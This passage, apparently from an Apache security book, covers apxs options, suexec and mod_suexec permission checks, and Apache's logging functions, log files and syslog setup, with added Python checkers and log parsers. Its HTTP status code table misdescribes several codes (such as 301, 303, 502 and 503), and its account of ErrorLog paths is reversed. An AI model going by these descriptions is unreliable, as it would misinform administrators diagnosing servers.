                         you don't specify an outfile, it guesses (by taking the first file's name
                         and adapting it, for example, mod_name.so).
-o [dsofile]             Use this to specify the outfile.
-D var[=val]             Use this to send additional defines through to compilation.
-I [incl-dir]            Use this to pass additional include directories to the compilation
                         process.
-L [lib-dir]             Use this to pass additional libraries to the compilation process.
-Wc,[compiler-flags]     Use this to pass additional compiler flags.
-Wl,[linker-flags]       Use this to pass linker flags to the linker command.
-i                       This instructs apxs to install the DSOs into the server's libexec
                         directory.
-a                       This automatically inserts a LoadModule into httpd.conf, thus making
                         the new module load automatically on Apache's next startup.
-A                       This adds a LoadModule reference to httpd.conf, but comments it out.
                         This is the editing option, which you can use with -a and -A to edit
                         httpd.conf.





suexec

suexec, or Switch User for Exec, solved a serious security issue by allowing you to run
CGI scripts as a specified user and group. This eliminated many CGI and SSI security
holes, because with it you could more precisely control the permissions of scripts and
shelled-out commands.

suexec proper (the program) emerged in Apache 1.2 as a wrapper that stood between
Apache serving a dynamic URI and the script that would generate that URI's
dynamic output.

When suexec received such a request, it ran several tests:

• Did Apache send the appropriate arguments? If not, suexec would refuse.
• Was the user who called the script valid, and if so, was it allowed to execute it?
  If not, suexec would refuse.
• Were the target user's username and group valid, and were these not root? If
  not, suexec would refuse.
• Did the target directory exist? If not, suexec would refuse.
• Was it under DocumentRoot? If not, suexec would refuse.
• Was it nonwritable? If not, suexec would refuse.
• Was the target setuid or setgid? If so, suexec would refuse.
• Did the user own the target file? If not, suexec would refuse.
• Could suexec launch the target script? If not, suexec would refuse.

By these mechanisms, suexec would check whether a CGI or SSI was safe, especially
from a permission standpoint.
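The checks listed above can be expressed as an ordinary filesystem audit, which is useful for finding scripts that will fail under suexec before you turn it on. The following Python script is an added example, not suexec's own code and not from this book: it re-implements the ownership and permission tests described above for a given script path, DocumentRoot, and target UID/GID. The UID_MIN/GID_MIN values and the sample directory layout that demo() builds are constructed for the demonstration.

```python
import os
import shutil
import stat
import tempfile

# Constructed lower bounds for this example. suexec's real values are fixed at
# build time by --suexec-uidmin and --suexec-gidmin (see Table 8.12).
UID_MIN = 100
GID_MIN = 100


def check_cgi_target(path, docroot, target_uid, target_gid,
                     uid_min=UID_MIN, gid_min=GID_MIN):
    """Return the reasons a suexec-style wrapper would refuse to run `path`
    as target_uid:target_gid. An empty list means every check passed.
    Independent re-implementation of the checks described above, for
    illustration only; not suexec's own code."""
    reasons = []

    # Target user and group must not be root and must not fall below the minimums.
    if target_uid == 0:
        reasons.append("target user is root")
    elif target_uid < uid_min:
        reasons.append("target UID is below the configured minimum")
    if target_gid == 0:
        reasons.append("target group is root")
    elif target_gid < gid_min:
        reasons.append("target GID is below the configured minimum")

    script = os.path.realpath(path)
    directory = os.path.dirname(script)

    # The target directory must exist and must lie under DocumentRoot.
    if not os.path.isdir(directory):
        reasons.append("target directory does not exist")
        return reasons
    root = os.path.realpath(docroot)
    if os.path.commonpath([root, directory]) != root:
        reasons.append("target directory is not under DocumentRoot")

    # The directory must not be writable by group or others.
    if os.stat(directory).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("target directory is group- or world-writable")

    if not os.path.isfile(script):
        reasons.append("target script does not exist")
        return reasons
    st = os.stat(script)

    # The script must not be setuid/setgid and must not be writable by others.
    if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
        reasons.append("target script is setuid or setgid")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("target script is group- or world-writable")

    # The target user must own the script, and it must be executable.
    if st.st_uid != target_uid:
        reasons.append("target script is not owned by the target user")
    if not st.st_mode & stat.S_IXUSR:
        reasons.append("target script is not executable by its owner")

    return reasons


def demo():
    """Build a constructed DocumentRoot in a temporary directory and run the
    checks against one well-formed script and three deliberately bad ones."""
    uid, gid = os.getuid(), os.getgid()
    tmp = tempfile.mkdtemp()
    try:
        docroot = os.path.join(tmp, "html")
        cgi_dir = os.path.join(docroot, "cgi-bin")
        outside = os.path.join(tmp, "elsewhere")
        for d in (docroot, cgi_dir, outside):
            os.makedirs(d)
            os.chmod(d, 0o755)

        cases = {
            "good": (os.path.join(cgi_dir, "ok.cgi"), 0o755),
            "world_writable": (os.path.join(cgi_dir, "loose.cgi"), 0o777),
            "setuid": (os.path.join(cgi_dir, "suid.cgi"), 0o4755),
            "outside_docroot": (os.path.join(outside, "stray.cgi"), 0o755),
        }
        results = {}
        for name, (p, mode) in cases.items():
            with open(p, "w") as f:
                f.write("#!/bin/sh\necho Content-type: text/plain\necho\n")
            os.chmod(p, mode)
            # Lower the minimums so the current account qualifies as the target.
            results[name] = check_cgi_target(p, docroot, uid, gid,
                                             uid_min=min(uid, UID_MIN),
                                             gid_min=min(gid, GID_MIN))
        return results
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    for case, why in demo().items():
        print(case, "->", why or "accepted")
```

If you run demo() as root, even the "good" case is reported with "target user is root", which is exactly the refusal suexec makes for a root target; the file- and directory-based reasons are what the other three cases exercise.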
NOTE

Curious side note: Sometimes, though rarely, security utilities suffer from the same ills they
purport to cure. That was the case with suexec in Linux Mandrake 7.1. Apache for 7.1 had
bad permissions on the suexec wrapper, leading to unintended results.


Table 8.12 lists suexec command-line options.

TABLE 8.12 suexec Options and Arguments

Option or Argument         Significance

--enable-suexec            Enables the suexec feature, and demands at least one other option.
--suexec-caller=[UID]      Use this to specify the username under which Apache normally
                           runs (this is the user authorized to use suexec).
--suexec-docroot=[DIR]     Use this to set DocumentRoot.
--suexec-gidmin=[GID]      Use this to specify the lowest GID allowed for a suexec target
                           user's group.
--suexec-logfile=[FILE]    Use this to specify the log file (this file will contain suexec usage
                           logs).
--suexec-safepath=[PATH]   Use this to set the safe PATH environment to pass to CGI executables.
--suexec-uidmin=[UID]      Use this to specify the lowest UID allowed to be a suexec target user.
--suexec-userdir=[DIR]     Use this to specify the subdirectory under users' home directories
                           where you allow suexec to operate.





Today, suexec functionality is embedded in a module called mod_suexec. mod_suexec
runs CGI scripts as a specified user and group.

The syntax is

SuexecUserGroup user group

user is the username you specify, and this must be a valid user. group is the group
you specify.

Note that enabling suexec could initially break many scripts on your server.
Certainly, all scripts that do not conform to suexec's permission scheme will fail
(Apache will return a 500 error code on these scripts, complaining of script headers
ending prematurely).

To avoid this, ensure that

• Apache calls scripts in user directories (/~username) by their proper names
  (if you mapped a virtual domain to a user directory, Apache must call that
  script from the user directory and not with a virtual domain base URL).
• For Apache to call and suexec to process such scripts, the scripts carry the
  same permissions you specified. If they don't, suexec will stop.
• You establish designated CGI directories for virtual domains on a host-by-host
  basis. That is, you cannot declare a blanket cgi-bin directory via ScriptAlias
  and leave it at that. Here's why: suexec relies on user and group values.
  Because each virtual domain's directory will have different user and group
  values, you'll need to make provisions for suexec execution for each such
  directory.

You control mod_suexec using the SuexecUserGroup directive, as demonstrated
previously.


Summary 


This chapter was merely a refresher on operating-system access controls and other
general administrative issues, subjects you likely know well. However, in a significant
percentage of cases, mishaps in these areas can undermine Apache's otherwise excellent
security. (Sometimes, instituting different permissions on files residing in the
same directory, for example, can be complicated.) It pays to periodically check
permissions beneath DocumentRoot and in your users' directories (if you have any).
What Is Logging, Exactly?

Many newbie Web administrators know little about logging. This is the case even
though many network applications offer extensive logging facilities. Casual users in
particular rarely exploit the wealth of information logs offer—chiefly because they
have no reason to. However, as a Webmaster, you'll find that logs are indispensable.


Briefly, logging is any procedure by which an application records events as they
happen and preserves these records for later perusal.

It's difficult to say when logging first became a staple in computing, but it stems
from the discipline of programming. When developers write programs, they want
diagnostic data on hand. Such diagnostic data can reveal flaws in a program's logic
or behavior.

Some things logs can reveal are

• Whether the program faulted, and if so, when and why
• The program's UID and PID
• Who used the program and when
• Whether the program is performing tasks as you intended
In a security context, however, logging serves a narrower function: to preserve
evidence of an attacker's evil deeds.


How Apache Handles Logging 


Although Apache applies many functions and constants in or related to logging, its
chief logging functions are the following:

• ap_log_error
• ap_log_perror
• ap_log_rerror

Let's briefly examine these now.

ap_log_error

ap_log_error is the primary logging routine in Apache. Its structure looks like this:

AP_DECLARE(void) ap_log_error(const char *file, int line, int level,
                              apr_status_t status, const server_rec *s,
                              const char *fmt, ...)
                              __attribute__((format(printf,6,7)));

Broken down, its elements are as follows:

• file—Stores the file you call the function from
• line—Stores the line number you call it from
• level—Stores the error message's level
• status—Stores the previous command's status code
• s—Stores the server on which you're logging
• fmt—Stores the format string
• ...—Stores the arguments that fill fmt


ap_log_perror

ap_log_perror is the second of the primary logging routines in Apache, and writes
to error_log using a printf-like format. Its structure looks like this:

AP_DECLARE(void) ap_log_perror(const char *file, int line, int level,
                               apr_status_t status, apr_pool_t *p,
                               const char *fmt, ...)
                               __attribute__((format(printf,6,7)));

Broken down, its elements are as follows:

• file—Stores the file you call the function from
• line—Stores the line number you call it from
• level—Stores the error message's level
• status—Stores the previous command's status code
• p—The pool that you're logging for
• fmt—Stores the format string
• ...—Stores the arguments that fill fmt


ap_log_rerror

ap_log_rerror is the last of the primary logging routines in Apache, and writes to
error_log using a printf-like format. Its structure looks like this:

AP_DECLARE(void) ap_log_rerror(const char *file, int line, int level,
                               apr_status_t status, const request_rec *r,
                               const char *fmt, ...)
                               __attribute__((format(printf,6,7)));

Broken down, its elements are as follows:

• file—Stores the file you call the function from
• line—Stores the line number you call it from
• level—Stores the error message's level
• status—Stores the previous command's status code
• r—The request that you're logging for
• fmt—Stores the format string
• ...—Stores the arguments that fill fmt


Other Apache Logging Functions and Facilities

In addition to ap_log_error, ap_log_perror, and ap_log_rerror, Apache contains
numerous functions and constants that assist in or otherwise support the logging
process.

Apache Log Constants

Apache log constants appear throughout Apache's source code. Table 9.1 describes
the major Apache log constants.
TABLE 9.1 Apache Log Constants

Constant            Description

APLOG_ALERT         Logging alert messages
APLOG_CRIT          Logging critical messages
APLOG_DEBUG         Logging debug messages
APLOG_EMERG         Logging emergency messages
APLOG_ERR           Logging error messages
APLOG_INFO          Logging informational messages
APLOG_LEVELMASK     Logging messages that exceed minimum level
APLOG_NOTICE        Logging notice messages
APLOG_WARNING       Logging warning messages
APLOG_WIN32ERROR    Logging WIN32 error messages
SERVER_BUSY_LOG     Indicates Apache is writing to a log file

Table 9.2 lists the mask levels of each log constant.


TABLE 9.2 Apache Log Mask Levels

Constant          Mask Level

APLOG_EMERG       0
APLOG_ALERT       1
APLOG_CRIT        2
APLOG_ERR         3
APLOG_WARNING     4
APLOG_NOTICE      5
APLOG_INFO        6
APLOG_DEBUG       7

When writing code to log messages into the appropriate log files, use this syntax:

ap_log_rerror(APLOG_MARK, APLOG_NOERRNO|APLOG_CONSTANT, r, "%s", message);

CONSTANT, in this case, could be any valid error constant, including ALERT, CRIT,
DEBUG, EMERG, ERR, INFO, LEVELMASK, MARK, NOERRNO, NOTICE, WARNING, or WIN32ERROR.
Passing message through a "%s" format, rather than handing it over as the format
string itself, means that any % sequences in the message text are printed literally
instead of being interpreted as format directives.


Other Apache Logging Components 
Apache also supports many modules that carry log functions, routines, hooks, and 
constants. Table 9.3 lists several of them. 


NOTE 


Line numbers referenced in Table 9.3 point to what line of source code the discussed function 
begins on before includes. 
TABLE 9.3 Some Apache Modules That Reference Logging Functions, Hooks, and
Constants

Module               Explanation

apr_cpystrn.c        This is Apache's replacement for the strncpy() function.
                     apr_cpystrn() is considered superior because it null terminates and
                     doesn't null fill. On line 254, it calls apr_log_error().
http_request.c       Contains functions to get and process requests. When it encounters a
                     bad URL request from the user, it calls ap_log_rerror() on line 221.
mod_dav.c            This is the DAV extension module for Apache 2.0. This is a Web-based
                     Distributed Authoring and Versioning extension module that lets users
                     collaboratively edit and maintain files on remote servers. It calls
                     ap_log_error() too many times to mention, especially in
                     dav_log_err().
mod_info.c           This is the information module, which displays configuration
                     information for the server and all included modules. It calls the hook
                     ap_hook_get_log_transaction.
mod_isapi.c          This module implements Microsoft's ISAPI, enabling Windows-based
                     Apache to load Internet Server Applications (ISAPI) from the ISAPI 2.0
                     specification. The only exceptions to this are the Microsoft-exclusive
                     asynchronous I/O extensions. It calls ap_log_error() on lines 277,
                     287, 299, 315, 486, 516, 844, 861, 875, 895, 971, 984, 992, 1072,
                     1080, 1120, 1138, 1147, 1244, 1249, and 1257.
mod_log_config.c     This module implements the TransferLog directive (used by the
                     common log module), and the additional directives LogFormat and
                     CustomLog. You'll be using these a great deal when you specify how,
                     where, why, and what your logging facilities log. It uses
                     ap_log_error() on line 1056, and uses the static hooks
                     ap_hook_pre_config(), ap_hook_child_init(),
                     ap_hook_open_logs(), and ap_hook_log_transaction(), plus the
                     per-item logging functions log_remote_host(),
                     log_remote_address(), log_local_address(),
                     log_remote_logname(), log_remote_user(), log_request_line(),
                     log_request_file(), log_request_uri(), log_request_method(),
                     log_request_protocol(), log_request_query(), log_status(),
                     clf_log_bytes_sent(), log_bytes_sent(), log_header_in(),
                     log_header_out(), log_note(), log_env_var(), log_cookie(),
                     log_request_time(), log_request_duration(),
                     log_request_duration_microseconds(), log_virtual_host(),
                     log_server_port(), log_server_name(), log_child_pid(), and
                     log_connection_status().
mod_rewrite.c        This is the URL Rewriting Module, which uses a rule-based rewriting
                     engine (based on a regular-expression parser) to rewrite requested URLs
                     on the fly. It calls ap_log_error() on lines 946, 981, 1115, 1358, 2687,
                     2725, 2788, 3188, 3128, 3269, and 3340.
mod_ssl_engine_log.c This module handles SSL errors and logs them. It uses ssl_log_open().
mod_status.c         This module displays copious internal data about how Apache is
                     performing and the state of all child processes. It calls
                     ap_log_rerror() on line 267.
mod_usertrack.c      This Apache module uses the client-side cookie protocol developed by
                     Netscape to track users.
mod_winnt_mem.c      This module contains Windows-specific information and functions. (For
                     example, code that enables Apache to accept processing on Windows
                     95/98 uses a producer/consumer queue model. A single thread accepts
                     connections and queues the accepted socket to the accept queue for
                     consumption by a pool of worker threads.) It calls ap_log_error()
                     many times.





Apache Logging Routines and Hooks

This next section lists important Apache logging routines and hooks and describes
their respective functions.

• ap_close_piped_log—Closes the piped log and kills the logging process. See
  log.c (line 755) and http_log.h (line 260): AP_DECLARE(void)
  ap_close_piped_log(piped_log *pl).
• ap_error_log2STDERR—Converts STDERR to the error log. See log.c (line 327)
  and http_log.h (line 216): AP_DECLARE(void)
  ap_error_log2STDERR(server_rec *s).
• ap_get_remote_logname—Retrieves the login name of the remote user, if
  available. See http_core.h, line 202: AP_DECLARE(const char *)
  ap_get_remote_logname(request_rec *r).
• ap_log_assert—Logs an assertion to the error log. See log.c, on line 559, and
  httpd.h, on line 1549: AP_DECLARE(void) ap_log_assert(const char *szExp,
  const char *szFile, int nLine) __attribute__((noreturn));
• ap_log_error—One of the primary logging routines in Apache. See http_log.h
  (line 158), log.c, and most modules.
• ap_log_error_old—No longer evident as of version 2.0.28.
• ap_log_pid—Logs the current PID of the parent process. See http_log.h (line
  223): AP_DECLARE(void) ap_log_pid(apr_pool_t *p, const char *fname);
  takes a pool and a file to log to.
• ap_log_reason—Explains the reason for the log element. In default_handler.
  (Example: "file permissions deny server access")
• ap_log_transaction—Hook:
  AP_DECLARE_HOOK(int,log_transaction,(request_rec *r)), allows modules
  to do module-specific logging. See http_protocol.h, line 572. Defines the
  current request (r) and the status (OK, DECLINED, or HTTP_SOMETHING).
• ap_open_logs—Opens the error log and replaces STDERR with it. See
  http_log.h, line 127: void ap_open_logs(server_rec *s_main, apr_pool_t *p).
  Defines the main server (s_main) and the pool (p).
• ap_open_piped_log—Opens the piped log process. See http_log.h, line 253:
  AP_DECLARE(piped_log *) ap_open_piped_log(apr_pool_t *p, const char
  *program). Takes a pool (p) and the targeted program (program), and returns
  the piped log structure.


httpd Logs

httpd stores its logs in /var/log/httpd/apache in two files:

• access_log—Stores general access information: who contacted the server,
  when, how, and the actions taken.
• error_log—Stores access and other errors.

Let's look at the format of these files now.

access_log: The HTTP Access Log File

access_log stores the following values:

• The visitor's IP address
• The event's time and date
• The command or request
• The status code
Some sample output:

[root@linux6 apache]# more access_log
172.16.0.1 - - [01/Jan/2001:13:09:46 -0700] "GET / HTTP/1.0" 200 1879
172.16.0.1 - - [01/Jan/2001:13:09:46 -0700] "GET / HTTP/1.0" 200 1879
172.16.0.1 - - [01/Jan/2001:13:09:46 -0700] "GET /mmback.gif HTTP/1.0" 404 204
172.16.0.1 - - [01/Jan/2001:13:09:46 -0700] "GET /mmback.gif HTTP/1.0" 404 204
172.16.0.1 - - [01/Jan/2001:13:09:46 -0700] "GET /head.gif HTTP/1.0" 200 17446
172.16.0.1 - - [01/Jan/2001:13:09:46 -0700] "GET /head.gif HTTP/1.0" 200 17446
172.16.0.1 - - [01/Jan/2001:13:09:57 -0700] "GET /mmback.gif HTTP/1.0" 404 204
172.16.0.1 - - [01/Jan/2001:13:09:57 -0700] "GET /mmback.gif HTTP/1.0" 404 204
172.16.0.1 - - [01/Jan/2001:13:10:04 -0700] "POST / HTTP/1.0" 405 228
172.16.0.1 - - [01/Jan/2001:13:10:04 -0700] "POST / HTTP/1.0" 405 228
172.16.0.1 - - [01/Jan/2001:13:10:06 -0700] "GET /mmback.gif HTTP/1.0" 404 204
172.16.0.1 - - [01/Jan/2001:13:10:06 -0700] "GET /mmback.gif HTTP/1.0" 404 204

Table 9.4 provides a quick reference for httpd status codes. 








TABLE 9.4 httpd Status Codes

Code    What It Means

200     The 200 code indicates that everything went well; the transfer was successful and
        occurred without error.
201     The 201 code indicates that a POST command was issued and satisfied successfully
        without event.
202     The 202 code indicates that the client's command was accepted by the server for
        processing.
203     The 203 code indicates that the server could only partially satisfy the client's
        request.
204     The 204 code indicates that the client's request was processed, but that the server
        couldn't return any data.
300     The 300 code indicates that the client requested data that has recently been
        moved.
301     The 301 code indicates that the server found the client's requested data at an
        alternate, temporarily redirected URL.
302     The 302 code indicates that the server suggested an alternate location for the
        client's requested data.
303     The 303 code indicates that there was a problem because the server could not
        modify the requested data.
400     The 400 code indicates that the client made a malformed request that could
        therefore not be processed.
401     The 401 code indicates that the client tried to access data that it is not authorized
        to have.
402     The 402 code indicates that a payment scheme has been negotiated.
403     The 403 code indicates that access is forbidden altogether.
404     The 404 code (the most often-seen code) indicates that the document was not
        found.
500     The 500 code indicates that an internal server error occurred from which the server
        could not recover. (This is a common error when a client calls a flawed CGI script.)
501     The 501 code indicates that the client requested an action that the server cannot
        perform or does not support.
502     The 502 code indicates that the server is overloaded.
503     The 503 code indicates that httpd was waiting for another gateway service to
        return data, but that the external service hung or died.
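As an added example (not from the book and not Apache's code), here is a small Python parser for lines in the format of the access_log excerpt above, together with a report that buckets each client's requests by the status-code classes of Table 9.4. The sample log text is constructed: the 10.0.0.7 request and the malformed final line are additions that show how a 500 and an unparseable line are handled.

```python
import re
from collections import Counter

# Common Log Format: host ident authuser [date] "request" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Constructed sample in the format of the access_log excerpt above. The
# 10.0.0.7 line and the malformed last line are additions for illustration.
SAMPLE_ACCESS_LOG = """\
172.16.0.1 - - [01/Jan/2001:13:09:46 -0700] "GET / HTTP/1.0" 200 1879
172.16.0.1 - - [01/Jan/2001:13:09:46 -0700] "GET /mmback.gif HTTP/1.0" 404 204
172.16.0.1 - - [01/Jan/2001:13:09:46 -0700] "GET /head.gif HTTP/1.0" 200 17446
172.16.0.1 - - [01/Jan/2001:13:09:57 -0700] "GET /mmback.gif HTTP/1.0" 404 204
172.16.0.1 - - [01/Jan/2001:13:10:04 -0700] "POST / HTTP/1.0" 405 228
172.16.0.1 - - [01/Jan/2001:13:10:06 -0700] "GET /mmback.gif HTTP/1.0" 404 204
10.0.0.7 - - [01/Jan/2001:13:12:00 -0700] "GET /cgi-bin/test.cgi HTTP/1.0" 500 0
this line is not in common log format
"""


def parse_line(line):
    """Parse one CLF line into a dict, or return None if it does not match."""
    m = CLF_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["size"] = 0 if entry["size"] == "-" else int(entry["size"])
    return entry


def parse_log(text):
    """Return (entries, rejected_lines). Lines that do not parse are kept for
    review rather than dropped: an unparseable line can mean a changed
    LogFormat, a truncated write, or tampering."""
    entries, rejected = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        entry = parse_line(line)
        if entry:
            entries.append(entry)
        else:
            rejected.append(line)
    return entries, rejected


def status_class(code):
    """Map a status code to its class, following the groupings of Table 9.4."""
    return {2: "success", 3: "redirection", 4: "client error",
            5: "server error"}.get(code // 100, "other")


def status_summary(entries):
    """Count how often each status code appears."""
    return Counter(e["status"] for e in entries)


def error_report(entries):
    """Per-host counts of client and server errors, plus the paths behind each
    404, which is what an administrator scans first for probing clients."""
    report = {}
    for e in entries:
        host = report.setdefault(e["host"], {"client_errors": 0,
                                             "server_errors": 0,
                                             "not_found": Counter()})
        cls = status_class(e["status"])
        if cls == "client error":
            host["client_errors"] += 1
            if e["status"] == 404:
                host["not_found"][e["path"]] += 1
        elif cls == "server error":
            host["server_errors"] += 1
    return report


if __name__ == "__main__":
    entries, rejected = parse_log(SAMPLE_ACCESS_LOG)
    print(status_summary(entries))
    for host, info in error_report(entries).items():
        print(host, info)
    print("unparsed lines:", rejected)
```

The regular expression is deliberately strict (three-digit status, digits or "-" for the byte count, end-of-line anchor) so that a line which does not look like CLF is reported instead of being half-parsed.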





error_log: The Error Message Log

error_log, as its name would suggest, stores errors. As reported in Apache's online
documentation:

The server error_log, whose name and location is set by the ErrorLog directive, is the most
important log file. This is the place where Apache httpd will send diagnostic information and
record any errors that it encounters in processing requests. It is the first place to look when a
problem occurs with starting the server or with the operation of the server, because it will
often contain details of what went wrong and how to fix it.

error_log stores the following fields by default:

• The date and time
• The type of report (error)
• The reason for the error
• The service
• The action taken (sometimes)

Some sample output:

[root@linux6 apache]# more error_log
[Thu Jan 1 12:03:01 2001] [notice] Apache/1.3.1 (Unix) configured -- resuming normal operations
[Thu Jan 1 13:09:46 2001] [error] File does not exist: /home/httpd/html/mmback.gif
[Thu Jan 1 13:09:57 2001] [error] File does not exist: /home/httpd/html/mmback.gif
[Thu Jan 1 13:10:06 2001] [error] File does not exist: /home/httpd/html/mmback.gif
[Thu Jan 1 13:33:30 2001] [notice] httpd: caught SIGTERM, shutting down
[Thu Jan 1 13:35:04 2001] [notice] Apache/1.3.1 (Unix) configured -- resuming normal operations
[Thu Jan 1 13:51:39 2001] [notice] httpd: caught SIGTERM, shutting down
[Thu Jan 1 21:23:28 2001] [notice] Apache/1.3.1 (Unix) configured -- resuming normal operations
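The following Python code is an added example, not from the book and not Apache's own code. It parses lines in the error_log format shown above and applies the severity order of Table 9.2 to decide which of them a server running at a given LogLevel would actually have written, which shows what a too-restrictive LogLevel hides from you. The sample text is constructed; the [crit] and [debug] lines are additions not taken from the page.

```python
import re
from collections import Counter

# Severity order of Apache's log levels, most urgent first. This is the same
# order as the mask values in Table 9.2 (APLOG_EMERG is 0, APLOG_DEBUG is 7),
# using the names that appear in error_log and in the LogLevel directive.
LEVELS = ["emerg", "alert", "crit", "error", "warn", "notice", "info", "debug"]

ERROR_LINE_RE = re.compile(
    r'^\[(?P<time>[^\]]+)\] \[(?P<level>[a-z]+)\] (?P<message>.*)$')

# Constructed sample in the format of the error_log excerpt above. The [crit]
# and [debug] lines are added for illustration; they are not from the page.
SAMPLE_ERROR_LOG = """\
[Thu Jan 1 12:03:01 2001] [notice] Apache/1.3.1 (Unix) configured -- resuming normal operations
[Thu Jan 1 13:09:46 2001] [error] File does not exist: /home/httpd/html/mmback.gif
[Thu Jan 1 13:09:57 2001] [error] File does not exist: /home/httpd/html/mmback.gif
[Thu Jan 1 13:33:30 2001] [notice] httpd: caught SIGTERM, shutting down
[Thu Jan 1 13:40:00 2001] [crit] (98)Address already in use: make_sock: could not bind to port 80
[Thu Jan 1 13:41:12 2001] [debug] example.c(42): hypothetical debug chatter
"""


def parse_error_log(text):
    """Parse error_log lines into dicts with time, level and message; lines
    that do not match the format are skipped."""
    entries = []
    for line in text.splitlines():
        m = ERROR_LINE_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def would_be_logged(level, loglevel):
    """True if a message at `level` is written when LogLevel is `loglevel`.
    Apache writes everything at the configured level or more urgent."""
    return LEVELS.index(level) <= LEVELS.index(loglevel)


def filter_by_loglevel(entries, loglevel):
    """Keep only the entries a server running with LogLevel `loglevel` would
    have written at all."""
    return [e for e in entries if would_be_logged(e["level"], loglevel)]


def missing_files(entries):
    """Count the paths behind 'File does not exist' errors; repeated misses
    for one path usually point at a broken link or a probing client."""
    counts = Counter()
    for e in entries:
        if e["level"] == "error" and e["message"].startswith("File does not exist: "):
            counts[e["message"].split(": ", 1)[1]] += 1
    return counts


def restart_count(entries):
    """Count 'resuming normal operations' notices, i.e. server (re)starts."""
    return sum(1 for e in entries if "resuming normal operations" in e["message"])


if __name__ == "__main__":
    entries = parse_error_log(SAMPLE_ERROR_LOG)
    for lvl in ("error", "warn", "notice"):
        kept = filter_by_loglevel(entries, lvl)
        print("LogLevel %-6s keeps %d of %d lines" % (lvl, len(kept), len(entries)))
    print(missing_files(entries))
    print("restarts:", restart_count(entries))
```

Note that with LogLevel warn the two [notice] lines, including the SIGTERM shutdown and the restart, would never have reached the file; that is the trade-off the LogLevel directive described later in this chapter controls.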

Setting error_log's Location and Log Levels

To set error_log's location and log levels, you use two directives:

• ErrorLog
• LogLevel

Let's briefly look at those now.

ErrorLog

ErrorLog sets the location and name of error_log. If you precede the name with a
slash, then Apache will create and write this file in a location relative to ServerRoot.
The syntax is

ErrorLog file-path|syslog[:facility]

Here, file-path is where (in your directory structure) you want Apache to send logs.

syslog[:facility] is the facility (in syslog) to which you want Apache to send logs via
syslogd.

In version 1.3 and later, you can use syslog instead of a filename. This calls
syslogd(8) if your system supports it (this is for Unix folks). It uses syslog facility
local7 by default. However, you can change this by using syslog:facility and
naming some other facility in syslog(1). Let's briefly cover syslog now and the
implications of using it.


syslog and Logging

System and kernel messages in Unix are handled by two daemons:

• syslogd—Records the type of logging that many programs use. Typical values
  that syslogd traps include the program name, facility type, priority, and stock
  log message.
• klogd—Intercepts and logs kernel messages.

To see syslogd and klogd in action, look at /var/log/messages.

/var/log/messages receives message output from syslogd and klogd.

NOTE

If your system is antiquated, messages might flow to /var/adm instead.

System and kernel diagnostic messages appear in the order in which they are
received:


[root@linux6 log]# more messages
Jan 1 12:02:50 linux6 syslogd 1.3-3: restart.
Jan 1 12:02:52 linux6 kernel: klogd 1.3-3, log source = /proc/kmsg started.
Jan 1 12:02:52 linux6 kernel: Loaded 4122 symbols from /boot/System.map-2.0.35.
Jan 1 12:02:52 linux6 kernel: Symbols match kernel version 2.0.35.
Jan 1 12:02:52 linux6 kernel: Loaded 95 symbols from 16 modules.
Jan 1 12:02:52 linux6 kernel: VFS: Mounted root (ext2 filesystem) readonly.
Jan 1 12:02:52 linux6 kernel: lp0 at 0x03bc, (polling)
Jan 1 12:02:52 linux6 kernel: CSLIP: code copyright 1989 Regents of the University of California
Jan 1 12:02:52 linux6 kernel: SLIP: version 0.8.4-NET3.019-NEWTTY-MODULAR (dynamic channels, max=256).
Jan 1 12:02:52 linux6 kernel: PPP: version 2.2.0 (dynamic channel allocation)
Jan 1 12:02:52 linux6 kernel: PPP Dynamic channel allocation code copyright 1995 Caldera, Inc.
Jan 1 12:02:52 linux6 kernel: PPP line discipline registered.
Jan 1 12:02:52 linux6 kernel: Swansea University Computer Society IPX 0.34 for NET3.035
Jan 1 12:02:52 linux6 kernel: IPX Portions Copyright (c) 1995 Caldera, Inc.
Jan 1 12:02:52 linux6 kernel: sysctl: ip forwarding off
Jan 1 12:02:52 linux6 amd[23101]: My ip addr is 0x100007f
Jan 1 12:02:52 linux6 amd[23102]: file server localhost type local starts up
Jan 1 12:02:53 linux6 amd[23102]: /etc/amd.localdev mounted fstype toplvl on /





In addition to standard syslog and kernel messages, you'll also find messages from
network services:

Jan 1 12:10:38 linux6 syslog: LOGIN ON tty1 BY hapless
Jan 1 12:11:36 linux6 syslog: FAILED LOGIN 1 FROM 172.16.0.1 FOR haples, User not known to the underlying authentication module
Jan 1 12:11:36 linux6 syslog: FAILED LOGIN 1 FROM 172.16.0.1 FOR haples, User not known to the underlying authentication module
Jan 1 12:11:40 linux6 syslog: LOGIN ON ttyp0 BY hapless FROM 172.16.0.1
Jan 1 12:12:12 linux6 syslog: ROOT LOGIN ON tty1
Jan 1 12:14:37 linux6 ftpd[23622]: FTP LOGIN FROM 172.16.0.1 [172.16.0.1], hapless
Jan 1 12:14:41 linux6 ftpd[23622]: FTP session closed
Jan 1 12:15:07 linux6 ftpd[23625]: FTP LOGIN FROM 172.16.0.1 [172.16.0.1], hapless
Jan 1 12:15:15 linux6 ftpd[23625]: FTP session closed





syslog.conf: Customizing Your syslog

To customize syslog logging, you specify your rules in syslog.conf. As explained in
the syslog.conf manual page:

The syslog.conf file is the main configuration file for the syslogd(8) which logs system
messages on *nix systems. This file specifies rules for logging. For special features see the
sysklogd(8) manpage.

In syslog.conf, you define rules with two fields:

• The Selector field—What to log
• The Action field—Where to log it
Let's look at each field now.

In the Selector field, you must specify at least one of two values:

• The message type
• The message priority

The message type is called a facility, and must be one of these:

• auth—A security facility that tracks user authentication in various services such
  as FTP, login, and so on. Essentially, the auth facility tracks any user action that
  requires a username and password to log in or use the target resource.
• authpriv—A security facility that tracks security/authorization messages.
• cron—Tracks messages from the cron system. cron is a daemon that executes
  scheduled commands. See the cron manual page for more information.
• daemon—Tracks additional system daemon messages.
• kern—Tracks kernel messages.
• lpr—Tracks line printer system messages.
• mail—Tracks mail system messages.
• news—Tracks news system messages.
